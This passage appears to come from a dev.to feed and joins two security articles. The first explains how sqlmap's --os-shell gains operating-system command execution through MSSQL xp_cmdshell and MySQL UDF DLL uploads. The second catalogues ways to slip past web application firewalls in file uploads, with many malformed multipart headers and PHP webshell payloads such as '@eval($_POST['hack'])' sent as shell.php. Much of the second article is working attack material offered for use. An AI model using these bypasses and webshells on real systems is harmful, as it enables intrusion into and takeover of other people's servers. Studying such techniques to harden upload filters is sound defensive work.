&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6mqcg3ayu85z2c6djqqz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6mqcg3ayu85z2c6djqqz.png" alt=" " width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once enabled, commands could be issued either through Navicat or by using sqlmap’s &lt;code&gt;--os-shell&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpwvkyffcxptkq0a3zet6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpwvkyffcxptkq0a3zet6.png" alt=" " width="717" height="306"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw5zf2xpty9rz3kvn4s43.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw5zf2xpty9rz3kvn4s43.png" alt=" " width="800" height="270"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If a tool such as Navicat is used for the initial connection, one must manually verify whether the user is a database administrator and whether &lt;code&gt;xp_cmdshell&lt;/code&gt; is present.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;IS_SRVROLEMEMBER&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'sysadmin'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This returns &lt;code&gt;1&lt;/code&gt; if the current login is a member of the &lt;code&gt;sysadmin&lt;/code&gt; server role, i.e., it holds the same privilege level as &lt;code&gt;sa&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;COUNT&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;master&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dbo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sysobjects&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;xtype&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'x'&lt;/span&gt; &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'xp_cmdshell'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A result of &lt;code&gt;1&lt;/code&gt; indicates that &lt;code&gt;xp_cmdshell&lt;/code&gt; exists.&lt;/p&gt;

&lt;p&gt;After these checks, the process follows the same pattern described above.&lt;/p&gt;




&lt;p&gt;A Wireshark capture of the TCP stream reveals the data sent.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdpg4omcp3zgxaqyx4opc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdpg4omcp3zgxaqyx4opc.png" alt=" " width="800" height="271"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The code was copied to a text file and certain characters were replaced.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe034g8zfro0pzbayk20c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe034g8zfro0pzbayk20c.png" alt=" " width="800" height="258"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Before executing the user‑supplied command, sqlmap runs &lt;code&gt;ping -n 10 127.0.0.1&lt;/code&gt; and &lt;code&gt;echo 1&lt;/code&gt; (marked as ① and ② in the figure). The commands that follow (③ onwards) are hex‑encoded.&lt;/p&gt;

&lt;h3&gt;
  
  
  MySQL
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Prerequisites:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The database server permits external connections.
&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;secure_file_priv&lt;/code&gt; variable is either empty or set to a writable path.
&lt;/li&gt;
&lt;li&gt;Write access to the MySQL installation directory is available.
&lt;/li&gt;
&lt;li&gt;For versions later than 5.1, the &lt;code&gt;/lib/plugin&lt;/code&gt; directory (relative to the MySQL installation directory) must exist.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The MySQL &lt;code&gt;--os-shell&lt;/code&gt; method leverages user‑defined functions (UDFs) to execute commands. This topic is covered in greater detail in the article &lt;a href="https://cooltige.github.io/2020/06/02/Mysql-Udf%E6%8F%90%E6%9D%83/" rel="noopener noreferrer"&gt;MySQL UDF Privilege Escalation&lt;/a&gt;.&lt;/p&gt;




&lt;h4&gt;
  
  
  Test Environment
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Operating system: Microsoft Windows Server 2012 Standard
&lt;/li&gt;
&lt;li&gt;Database: MySQL 5.1.60
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Sqlmap is used to connect to the database.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8acbd1nz90sz9k3cxj3u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8acbd1nz90sz9k3cxj3u.png" alt=" " width="800" height="126"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After installing &lt;code&gt;pymysql&lt;/code&gt;, a second connection attempt is made; upon success, sqlmap displays the approximate database version.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9ei94wbkiye0u4kx8cyg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9ei94wbkiye0u4kx8cyg.png" alt=" " width="799" height="146"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;--os-shell&lt;/code&gt; flag is then issued.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fswz8uqw9jgruo2xmmr2q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fswz8uqw9jgruo2xmmr2q.png" alt=" " width="799" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;At this point, sqlmap performs five key actions:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Connects to the MySQL database and retrieves its version.
&lt;/li&gt;
&lt;li&gt;Verifies whether the current user is a database administrator.
&lt;/li&gt;
&lt;li&gt;Checks if the &lt;code&gt;sys_exec&lt;/code&gt; and &lt;code&gt;sys_eval&lt;/code&gt; functions have already been created.
&lt;/li&gt;
&lt;li&gt;Uploads the appropriate DLL file to the target directory.
&lt;/li&gt;
&lt;li&gt;When the user exits, removes the &lt;code&gt;sys_exec&lt;/code&gt; and &lt;code&gt;sys_eval&lt;/code&gt; functions (by default).&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;A Wireshark TCP stream capture is analysed. The image below provides a detailed illustration of the process.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub-production-user-asset-6210df.s3.amazonaws.com%2F83846602%2F605389233-3ca82389-50d8-4b4f-9425-03846ba7f878.png%3FX-Amz-Algorithm%3DAWS4-HMAC-SHA256%26X-Amz-Credential%3DAKIAVCODYLSA53PQK4ZA%252F20260609%252Fus-east-1%252Fs3%252Faws4_request%26X-Amz-Date%3D20260609T222641Z%26X-Amz-Expires%3D300%26X-Amz-Signature%3D4c116f91cd6d39b94a49c22ce1edfb220f0022c27cb1b43df485b5695bdbca52%26X-Amz-SignedHeaders%3Dhost%26response-content-type%3Dimage%252Fpng" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub-production-user-asset-6210df.s3.amazonaws.com%2F83846602%2F605389233-3ca82389-50d8-4b4f-9425-03846ba7f878.png%3FX-Amz-Algorithm%3DAWS4-HMAC-SHA256%26X-Amz-Credential%3DAKIAVCODYLSA53PQK4ZA%252F20260609%252Fus-east-1%252Fs3%252Faws4_request%26X-Amz-Date%3D20260609T222641Z%26X-Amz-Expires%3D300%26X-Amz-Signature%3D4c116f91cd6d39b94a49c22ce1edfb220f0022c27cb1b43df485b5695bdbca52%26X-Amz-SignedHeaders%3Dhost%26response-content-type%3Dimage%252Fpng" alt=" " width="600" height="1188"&gt;&lt;/a&gt;&lt;/p&gt;




</description>
      <category>sql</category>
      <category>sqlmap</category>
      <category>shell</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>A Comprehensive Overview of WAF Bypass Methods for File Upload Vulnerabilities</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Mon, 08 Jun 2026 02:06:22 +0000</pubDate>
      <link>https://dev.to/excalibra/a-comprehensive-overview-of-waf-bypass-methods-for-file-upload-vulnerabilities-2gp4</link>
      <guid>https://dev.to/excalibra/a-comprehensive-overview-of-waf-bypass-methods-for-file-upload-vulnerabilities-2gp4</guid>
      <description>&lt;h2&gt;
  
  
  Analysis of HTTP File Upload Packets
&lt;/h2&gt;

&lt;p&gt;File upload is fundamentally a POST request sent by the client, whose message body carries the upload data. The front-end upload page must specify an &lt;code&gt;enctype&lt;/code&gt; of &lt;code&gt;multipart/form-data&lt;/code&gt; for the upload to succeed.&lt;/p&gt;

&lt;p&gt;A typical file upload packet resembles the following:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;http://www.example.com&lt;/span&gt; &lt;span class="k"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s"&gt;multipart/form-data; boundary=----WebKitFormBoundaryyb1zYhTI38xpQxBK&lt;/span&gt;

------WebKitFormBoundaryyb1zYhTI38xpQxBK
Content-Disposition: form-data; name="city_id"

1
------WebKitFormBoundaryyb1zYhTI38xpQxBK
Content-Disposition: form-data; name="company_id"

2
------WebKitFormBoundaryyb1zYhTI38xpQxBK
Content-Disposition: form-data; name="file"; filename="chrome.png"
Content-Type: image/png

PNG ... content of chrome.png ...
------WebKitFormBoundaryyb1zYhTI38xpQxBK--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The following characteristics may be extracted from the above:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The request header &lt;code&gt;Content-Type&lt;/code&gt; exhibits these features:

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;multipart/form-data&lt;/code&gt; – indicates that the request is a file upload request.&lt;/li&gt;
&lt;li&gt;Presence of a &lt;code&gt;boundary&lt;/code&gt; string – serves as the delimiter that separates the individual parts of the POST body.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;The POST body contains:

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;Content-Disposition&lt;/code&gt; – as an HTTP response header it indicates whether the content is expected to be displayed inline in the browser; inside a multipart body it is the per-part header that carries the &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;filename&lt;/code&gt; parameters listed next.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;name&lt;/code&gt; – the name of the HTML form field referenced by this part.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;filename&lt;/code&gt; – a string that holds the original name of the file being transmitted.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;The value of &lt;code&gt;boundary&lt;/code&gt; in the POST body is the value declared in &lt;code&gt;Content-Type&lt;/code&gt; prefixed with two hyphens &lt;code&gt;--&lt;/code&gt;, except for the final closing boundary.&lt;/li&gt;

&lt;li&gt;The closing boundary carries two additional trailing hyphens (in testing, removing the last boundary line did not prevent a successful upload).&lt;/li&gt;

&lt;/ul&gt;

&lt;h3&gt;
  
  
  Modifiable Elements in a File Upload Packet
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Content-Disposition&lt;/strong&gt; – generally alterable.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;name&lt;/strong&gt; – the form parameter value; should not be altered.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;filename&lt;/strong&gt; – the file name; can be modified.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Content-Type&lt;/strong&gt; – the file MIME type; can be changed depending on context.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;boundary&lt;/strong&gt; – the content delimiter; can be modified.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  How WAFs Intercept Malicious Files
&lt;/h2&gt;

&lt;p&gt;Consider how one might design a WAF. Defence may be approached from several angles:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;File name&lt;/strong&gt; – parse the file name and determine whether it appears in a blacklist.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;File content&lt;/strong&gt; – parse the file content to detect whether it constitutes a webshell.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;File directory permissions&lt;/strong&gt; – typically requires a host-based WAF.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Currently, most common WAFs parse the file name; a minority, such as Chaitin, also inspect file content. The discussion below focuses on file‑name‑based interception.&lt;/p&gt;

&lt;p&gt;The general process is as follows:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Extract the &lt;code&gt;boundary&lt;/code&gt; value from the &lt;code&gt;Content-Type&lt;/code&gt; header of the request.&lt;/li&gt;
&lt;li&gt;Using the boundary, parse the POST data to obtain the file name.&lt;/li&gt;
&lt;li&gt;Determine whether the file name falls within an interception blacklist or outside a whitelist.&lt;/li&gt;
&lt;/ol&gt;

&lt;blockquote&gt;
&lt;p&gt;Having understood how a WAF intercepts malicious files, I classify common bypass methods into the following categories. A demonstration using the latest version of Safedog concludes the article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Character Mutations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Quotation Mark Variations
&lt;/h3&gt;

&lt;p&gt;Values in header fields can be enclosed in single quotes, double quotes, or no quotes at all, without affecting the upload outcome.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: "form-data"; name=file_x; filename="xx.php"
Content-Disposition: form-data; name=file_x; filename="xx.php"
Content-Disposition: form-data; name=file_x; filename=xx.php
Content-Disposition: form-data; name="file_x"; filename=xx.php
Content-Disposition: form-data; name='file_x'; filename='xx.php'
Content-Disposition: 'form-data'; name="file_x"; filename='xx.php'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It is also possible to omit the trailing quotation mark of the &lt;code&gt;filename&lt;/code&gt; string, and the upload will still succeed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name="file_x"; filename="xx.php
Content-Disposition: form-data; name="file_x"; filename='xx.php
Content-Disposition: form-data; name="file_x"; filename="xx.php;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Case Modifications
&lt;/h3&gt;

&lt;p&gt;The following three fixed strings may be subjected to case changes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Content-Disposition&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;name&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;filename&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For example, &lt;code&gt;name&lt;/code&gt; may become &lt;code&gt;Name&lt;/code&gt;, and &lt;code&gt;Content-Disposition&lt;/code&gt; may become &lt;code&gt;content-disposition&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Inserting Line Break Characters
&lt;/h3&gt;

&lt;p&gt;Line-break or other whitespace characters can be inserted between the equals sign and a field value; in the examples below the placeholder &lt;code&gt;[0x09]&lt;/code&gt; denotes the inserted byte (0x09 is the ASCII horizontal tab, not a line feed).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: "form-data"; name="file_x"; filename=[0x09]"xx.php"
Content-Disposition: "form-data"; name="file_x"; filename=[0x09]"xx.php
Content-Disposition: "form-data"; name="file_x"; filename=[0x09]"xx.php"[0x09]
Content-Disposition: "form-data"; name="file_x"; filename=[0x09]xx.php
Content-Disposition: "form-data"; name="file_x"; filename=[0x09]xx.php[0x09];
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Multiple Semicolons
&lt;/h3&gt;

&lt;p&gt;During file parsing, the presence of multiple semicolons may prevent the WAF from correctly extracting the file name, thereby enabling a bypass.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name="file_x";;; filename="test.php"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Multiple Equals Signs
&lt;/h3&gt;

&lt;p&gt;Using multiple equals signs within the POST content has no effect on file upload.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; name=="file_x"; filename===="test.php"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Altering the Content-Disposition Value
&lt;/h3&gt;

&lt;p&gt;Some WAFs assume that the value of &lt;code&gt;Content-Disposition&lt;/code&gt; must be &lt;code&gt;form-data&lt;/code&gt;, which can lead to bypasses. In fact, &lt;code&gt;Content-Disposition&lt;/code&gt; may be arbitrarily altered or left empty.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: fOrM-DaTA; name="file_x"; filename="xx.php"
Content-Disposition: form-da+ta; name="file_x"; filename="xx.php"
Content-Disposition: fo    r m-dat a; name="file_x"; filename="xx.php"
Content-Disposition: form-dataxx; name="file_x"; filename="xx.php"
Content-Disposition: name="file_x"; filename="xx.php"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Malformed Boundary Headers
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;boundary&lt;/code&gt; can be mutated in the following ways without affecting the upload.&lt;/p&gt;

&lt;p&gt;Normal &lt;code&gt;boundary&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye111
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Malformed &lt;code&gt;boundary&lt;/code&gt; variations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The case of &lt;code&gt;multipart/form-data&lt;/code&gt; may be changed:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;  Content-Type: mUltiPart/ForM-dATa; boundary=----WebKitFormBoundarye111
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Spaces may separate &lt;code&gt;multipart/form-data&lt;/code&gt; and &lt;code&gt;boundary&lt;/code&gt;, and arbitrary content may be inserted between them:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;  Content-Type: multipart/form-data boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data x boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data abcdefg boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data a\|/?!@#$%^() boundary=----WebKitFormBoundarye111
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;A comma may separate &lt;code&gt;multipart/form-data&lt;/code&gt; and &lt;code&gt;boundary&lt;/code&gt;, with arbitrary content inserted between:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;  Content-Type: multipart/form-data,boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data,x,boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data,abcdefg,boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data,a\|/?!@#$%^(),boundary=----WebKitFormBoundarye111
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Arbitrary content may be inserted directly before the &lt;code&gt;boundary&lt;/code&gt; string (feasible on PHP):
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;  Content-Type: multipart/form-data;bypass&amp;amp;123**{|}boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data bypass&amp;amp;123**{|}boundary=----WebKitFormBoundarye111
  Content-Type: multipart/form-data,bypass&amp;amp;123**{|}boundary=----WebKitFormBoundarye111
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;At the end of the &lt;code&gt;boundary&lt;/code&gt;, a comma or semicolon may be used to separate and insert arbitrary content:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;  Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye111;123abc
  Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye111,123abc
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Sequence Reversal
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Swapping the Order of name and filename
&lt;/h3&gt;

&lt;p&gt;Because &lt;code&gt;Content-Disposition&lt;/code&gt; must appear first, only the order of &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;filename&lt;/code&gt; can be reversed. Some WAFs may expect &lt;code&gt;name&lt;/code&gt; before &lt;code&gt;filename&lt;/code&gt;, enabling a bypass.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Disposition: form-data; filename="xx.php"; name="file_x"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Swapping the Order of Content-Disposition and Content-Type
&lt;/h3&gt;

&lt;p&gt;Similarly, the order of &lt;code&gt;Content-Disposition&lt;/code&gt; and &lt;code&gt;Content-Type&lt;/code&gt; can be exchanged.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Content-Type: image/png
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Swapping the Order of Different Boundary Contents
&lt;/h3&gt;

&lt;p&gt;The contents of different boundary parts may also be reordered without affecting the upload.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryzEHC1GyG8wYOH1rf
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['x']);?&amp;gt;

------WebKitFormBoundaryzEHC1GyG8wYOH1rf--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Data Repetition
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Repetition of Boundary Content
&lt;/h3&gt;

&lt;p&gt;The file ultimately uploaded is &lt;code&gt;shell.php&lt;/code&gt; rather than &lt;code&gt;shell.jpg&lt;/code&gt;. However, if the WAF extracts only the first file name it encounters, a bypass may occur.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;------WebKitFormBoundarymeEzpUTMsmOfjwAA
Content-Disposition: form-data; name="upload_file"; filename="shell.jpg"
Content-Type: image/png

&amp;lt;?php @eval($_POST['hack']); ?&amp;gt;
------WebKitFormBoundarymeEzpUTMsmOfjwAA
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['hack']); ?&amp;gt;
------WebKitFormBoundarymeEzpUTMsmOfjwAA
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundarymeEzpUTMsmOfjwAA--
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The following variant also achieves a successful upload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;------WebKitFormBoundarymeEzpUTMsmOfjwAA
------WebKitFormBoundarymeEzpUTMsmOfjwAA--
------WebKitFormBoundarymeEzpUTMsmOfjwAA;123
------WebKitFormBoundarymeEzpUTMsmOfjwAA
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: image/png

&amp;lt;?php @eval($_POST['hack']); ?&amp;gt;
